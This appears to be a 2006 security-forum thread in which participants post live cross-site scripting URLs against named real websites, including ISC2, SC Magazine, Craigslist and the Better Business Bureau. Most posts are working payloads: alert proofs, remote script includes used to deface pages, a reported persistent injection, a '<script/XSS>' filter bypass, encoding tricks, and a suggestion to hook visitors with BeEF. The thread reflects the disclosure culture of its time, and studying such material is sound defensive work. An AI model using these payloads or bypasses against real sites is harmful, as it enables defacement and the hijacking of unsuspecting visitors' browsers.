http://ha.ckers.org/expect.swf?http://www.hoovers.com/

- RSnake
Gotta love it. http://ha.ckers.org

Kyran, you may be right, although the only reason I use the alert box is to prove that JavaScript can be injected... xss.js is more to prove you can include remote files into the HTML. Both are valid tests to prove XSS is possible. Personally I preferr the alert box because it's faster to test for and more obviously benign but be my guest if you want to use the remote include.

- RSnake
Gotta love it. http://ha.ckers.org

Imagine it we had all our XSSes to change location.href to another of our XSSes. We could create a pretty damn long chain of hops.

rsnake, that reflect thing works on every pre 1.3.35, 2.0.58, and 2.2.2 Apache server that doesn't have a custom 417 error page. This includes e-commerce sites like overclocking.co.uk

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer



Edited 2 time(s). Last edit at 09/22/2006 01:14PM by WhiteAcid.

Thinking of making an XSS enabled web-ring? ;)

- RSnake
Gotta love it. http://ha.ckers.org

I guess I was just pondering.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

I got a special request to enhance the defacements. This one is going out to all you XSS haXorz out there (same exploit - different flavor): http://www.scmagazine.com/us/search/index.cfm?fuseaction=XCU.Search.Simple&sSearchPhrase=%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org/weird/stallowned.js%20&sSection=ALL&x=0&y=0

- RSnake
Gotta love it. http://ha.ckers.org

Well I would guesstimate that atleast 75% of these with alert boxes, can load remote scripts as well (i'm too lazy to run a tally) .. so while i like the idea of uniformity, everyone aside from the dumbest of skiddies should be able to figure out how to test remote inclusion.

Once the hole has been shown to be there, and precisely how to overcome its filters if any - the method of exploitation i'll leave as an exercise for the exploiter.

That being said: rather than uniformity in the PoC demonstration, i think it would be much nicer for uniformity in its cataloging .. i.e. adopt a bug report type form

I'm also too lazy to decide on all the form fields but along the lines of:

PoC link(s):
Max Length:
Filtering:
Type(s): (anything, html, <script></script>, parameter inclusion - which tag, etc.)
umm.. any other brainstorming? maybe we should make a new thread for such discussion .. however id keep it optional, cuz i'm usually to lazy for such forms except for interesting sites or filters

that also may make this more of an emulation of securityfocus.com sans moderation _-_ .. i don't know if thats an improvement or not

-maluc

As long as it's interesting and (vaguely) relevant I have no interest in moderation so I won't institute it unless something starts annoying me. Spam is not tolerated, everything else is okay. I would never force someone to construct an exploit in a certain way either. It's your choice how you disclose.

- RSnake
Gotta love it. http://ha.ckers.org

ahaha rsnake.. love the hair.

https://www.isc2.org/cgi-bin/login.cgi?Command=TempPassword&CertificateNumber=%3Cscript%3Ealert%28%22Yes%2C+this+is+the+International+Information+System+Security+Certification+Consortium.+And+Yes%2C+they+should+probably+uncertify+themselves..%22%29%3C%2Fscript%3E&LastName=&HomeCity=&x=9&y=8

-maluc

Oh dear lord... ISC2? Ouch!

- RSnake
Gotta love it. http://ha.ckers.org

How about another.. but this time persistant. https://www.isc2.org/cgi-bin/request_studyguide_process.cgi?AG=44330&Type=a1dcxbn&LName=qwerty&FName=HiMom&City=SoUnsecure

the email field in https://www.isc2.org/cgi-bin/request_studyguide_form.cgi?AG=44330 is unfiltered, except no spaces.. but on the bright side 'To protect your information, your response is 128-bit SSL enabled and all information is encrypted.'

-maluc

That's really bad... I heard ISC2 was compromised at one point. Every security guy's personal information let loose. Not good.

- RSnake
Gotta love it. http://ha.ckers.org

Ouch. Also, while the normal remote text example is fine, I might start using that stallowned.js, for..uhm...Proof of Stallownage.
Yeah. That's it.

- Kyran

Ahahhahahahaha, no no wait, HAHAHAHA

really I don't like those fuckers, not that I am bitter that I was turned down for a job because I didn't have my CISSP...I went to 2 study sessions and couldn't believe the crap they were spouting and never went back.

__MOST POINTLESS CERT EVER__

-id

Kyran, be my guest. Hahah.

id, wait, if you didn't get a job because of it I think that by definition gives it a point. Quod erat demonstrandum. ;)

- RSnake
Gotta love it. http://ha.ckers.org

Watchfire's marketing might be dirty pool, but it sure is funny: http://ha.ckers.org/images/scmagazine-stallowned.png

- RSnake
Gotta love it. http://ha.ckers.org

Ahahahaha. That's hysterical.

- Kyran

Hahah... well it looks like we made some friends: http://www.darkreading.com/blog.asp?blog_sectionid=342&f_src=darkreading_section_342

I applaud darkreading for jumping on this, and for issuing their retort. It's nice to see journalistic integrity.

- RSnake
Gotta love it. http://ha.ckers.org

That's great! I love that people are really taking to this.
We've shown that it's really an issue. With a little e-mailing and a little luck, any xss hole can turn into a disaster for the company and their site.

Most importantly(to me ahaha), a few of the found exploits mentioned are mine.

Ego +1

- Kyran

HAHAHAHA
Oh man. I loved that.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

> .. perhaps we should all use the ha.ckers.org/xss.js script ..
why not using BeEF/hook/ ?
Then you can see who got trapped (at least those who have malware enabled in their browser;-)

I personally feel we should test out using SRC instead of just an alert.
I know most of the time, if you can get an alert, you can get a remote script going, but it is not always the case. In the MySpace classifieds a few weeks back, I could get an Alert off, but not a remote script or anything else. It's totally fixed now, but you get the idea.

- Kyran

if you can pass alert, then you still can use parantheses, a comma is not a problem usually, hence you have anthing you need for eval(StringFromCharCode()), probably a unescape() is sufficent too ...
Any problems?

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://search.bbb.org/?searchtype=url&url=%27%3E%3Cscript%2Fmaluc%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3B%3C%2Fscript%3E%3Cb+%27&search=Search better business bureau

it has an IPS that closes connection if you send <script> .. but <script/XSS> works fine.

-maluc

http://sfbay.craigslist.org/search/sss?query=</title>%3Cscript>alert('quack')</script>
http://sfbay.craigslist.org/search/sss?query=</title></head><body>%3Cscript%20src=http%3A%2F%2Fha.ckers.org/weird/stallowned.js></script> << for rsnake

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 1 time(s). Last edit at 09/22/2006 07:39PM by digi7al64.

http://www.allakhazam.com/fsearch.html?subject=%22%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22&content=&poster=&date1_m=1&date1_d=1&date1_y=1999&date2_m=1&date2_d=1&date2_y=2007&cats=all&dosearch=1

This was posted on the first page, I noticed something rather interesting.
In opera, this specific string doesn't produce an alert.

It comes out like this.
<input type="text" name="subject" value=""<SCRIPT>alert("XSS")</SCRIPT>"" size="30" maxlength="100" />
But, I have to close the previous tag before the script will run.
<input type="text" name="subject" value=""/><SCRIPT>alert("XSS")</SCRIPT><"" size="30" maxlength="100" />
(the last < was just to prevent the html from showing. )

It shows </script> in red, meaning it's only one tag, without a partner. The first <script> is in blue, showing it's PART of a tag, not a single tag itself.

Not really sure if it regards to anything...it's just odd.

- Kyran

a <style> at the end of an XSS string will eliminate the rest of the page if there is no closing style tag.

- Kyran

> It shows </script> in red, ... The first <script> is in blue ...

are you talking about mozilla's "View Source"?
Then keep in mind that it shows what it rendered, not what it got as response body from the server!

he is talking about Opera 9's view Source .. which highlights now too. Opera 8.5x does not

and the reason the opening <script> is in blue is because it gets inserted inside of the input tag.. Opera translates it as a parameter, with an empty value

i.e.: <INPUT type="text" name="subject" value="" <SCRIPT=""/>

thus the alert() is no longer part of a inline script, and </SCRIPT> has nothing to close. The full Opera translation being

<INPUT type="text" name="subject" value="" <SCRIPT=""/>alert("XSS")"" size="30" maxlength="100" /&gt;


Yet another way to tell the different browsers apart, which can't be spoofed like userAgent can.

-maluc

http://preference.the-dma.org/cgi/optoutemps2.php?email1=You+have+an+XSS+hole%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3B%3C%2Fscript%3E&email2=&email3=

-maluc